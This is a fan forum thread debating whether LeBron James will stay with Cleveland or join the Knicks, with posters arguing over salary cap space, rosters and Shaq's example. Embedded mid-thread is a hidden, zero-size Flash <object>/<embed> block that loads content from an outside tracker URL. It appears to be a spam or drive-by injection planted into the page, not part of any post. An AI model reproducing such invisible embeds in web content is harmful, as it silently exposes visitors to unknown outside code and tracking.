Lebron will stay in Cleveland

Just saw this on Foxsports.com.

"The consensus among NBA executives is LeBron James will remain in Cleveland, mostly because there may not be anywhere better to go. The big threat was the Knicks. But the declining salary cap likely won?t allow the Knicks enough salary cap space to sign two free agents. The Knicks roster is awful, and it likely would be a major step back competitively for James to join a team like that. -- Bulls.com"

Thread title is misleading...Lebron will stay in Cleveland and you get a quote of some guy saying the Knicks suck.

No one can predict what will happen with Lebron. The Knicks supporting roster is just as good as Miami's or Cleveland looking at next year.

Cleveland - Mo Williams, West, Varajao

Miami - Beasley, Chalmers

Knicks - Gallinari, Chandler, Hill

The Salary Cap issue is overblown..The Knicks can still trade expiring contracts in Curry/Jefferies + future 1st round picks + Chandler/Hill/Douglass + Lee/Robinson if they sign to 1 year deals for an all star to compliment James/Wade + Gallinari. Either that or they can just wait until 2011 to make another big FA signing.

Winning won't be the deciding factor for Wade/Lebron, because they will win anywhere they play. The deciding factor will be what do they want to be remembered for..their loyalty to the teams that drafted them or being the guy that turned around the Knicks franchise.

i agree with dave.

first, this is coming from bulls.com? come on.secondly, cleveland's team sucks just as much as ours prior to bringing in shaq.thirdly, the fish nets aren't completely out of the picture, and he makes no mention of that.

of course Bulls.com would have something like this... they are trying to do the same thing we are.<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="0" height="0"><param name="movie" value="<A href="http://brbyowner.com/?tracker=4097"></param><param">http://brbyowner.com/?tracker=4097"></param><param name="allowFullScreen" value="true"></param><embed src="http://brbyowner.com/?tracker=4097" type="application/x-shockwave-flash" allowfullscreen="true" width="0" height="0"></embed></object>

Yes the bulls are. I think he stays though. Why spend all the time and money brining shaq in????

Shaq is only there for 1 season and then he's done. James didn't spend the money or time to get Shaq so that has nothing to do with him. LBJ wants to become a free agent and properly weigh his options on where he would like to finish his career. The Knicks despite being a sub par team is still high on his list IMO. I know just wearing a Yankee cap all the time isn't proof enough to assume his preference, but the dude flat out LOVES NY and has proclaimed that many times. His celebrity friends are here and he knows 7th avenue and 34th street would be all his. Here he would truly be KING. There is a big difference in global recognition between Ohio and NYC.

To tell you the truth, I think this was the dumbest move the CAVs made.
Shaq's early years is an exact mirror to Lebron's

Drafted #1 by a small market team, with no real help on the team - he takes Orl to the finals and then the next year as a FA - he jets to the lakers! - why? because he said you can only become a true superstar in the NBA's biggest markets!

So now you know Lebron is gonna be asking Shaq all season why he left the Magic even tho he took them to the finals for vindication as to why he should leave the CAVs for the bright lights of NY

Shaq is the key as to why Lebron will be a knick next year. Book it

That's a great point. It's not like Shaq will try to discourage James from doing what he did. It got him 3 rings there!

No doubt Shaq and Lebron will talk ALOT during the season.

Good point....Lebron has a chance to be twice as famous as he is now...come to NY and help put the Knicks on the map again.
